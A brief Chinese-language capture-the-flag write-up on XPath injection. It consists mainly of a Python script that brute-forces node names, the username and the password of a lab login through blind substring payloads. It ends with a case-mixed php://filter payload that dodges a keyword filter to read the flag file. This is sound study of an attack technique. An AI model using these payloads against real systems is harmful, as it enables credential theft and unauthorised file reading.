XPATH注入学习
一道xpath注入题,又是陌生的知识,学习一下。
上面文章写得很通俗易懂了,就不多说了 直接上脚本
import time
import requests
import re
import string
import logging
# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
target='http://a6b8c73c-96c1-4e55-9f69-98d870a6fc1e.node3.buuoj.cn/login.php'
s = requests.session()
head ={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
"Content-Type": "application/xml"
}
find =re.compile('<input type="hidden" id="token" value="(.*?)" />')
str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()'
#根节点
# payload="<username>'or substring(name(/*[1]),{},1)='{}' or '=</username><password>123</password><token>{}</token>"
#子节点
# payload="<username>'or substring(name(/root/*[1]), {}, 1)='{}' or '=</username><password>3123</password><token>{}</token>"
#accounts节点
# payload="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}' or '=</username><password>3123</password><token>{}</token>"
#user节点
payload="<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}' or '=</username><password>3123</password><token>{}</token>"
#跑用户名和密码
payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}' or '=</username><password>3123</password><token>{}</token>"
payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}' or '=</username><password>3123</password><token>{}</token>"
def exp():
res = ''
for i in range(1,100):
flag=0
for str in str1:
r = s.post(url=target)
token = find.findall(r.text)
# print(token[0])
r = s.post(url=target, headers=head, data=payload_username.format(i, str, token[0]))
# print(payload.format(i, str, token[0]))
# print(r.text)
if '非法操作!' in r.text:
flag=1
res = res + str
print("now :{}".format(res))
break
if(flag==0):
break
print("最终结果: {}".format(res))
if __name__ == "__main__":
exp()
最后跑出来用户名adm1n
,密码cf7414b5bdb2e65ee43083f4ddbc4d9f
md5解密后的密码gtfly123
登录成功后得到一串base64加密的字符
提示flag在/flag
看url
应该是要读文件。
无法直接读,过滤了关键字,最后伪协议大小写绕过
phP://filter/convert.bAse64-encode/resource=/flag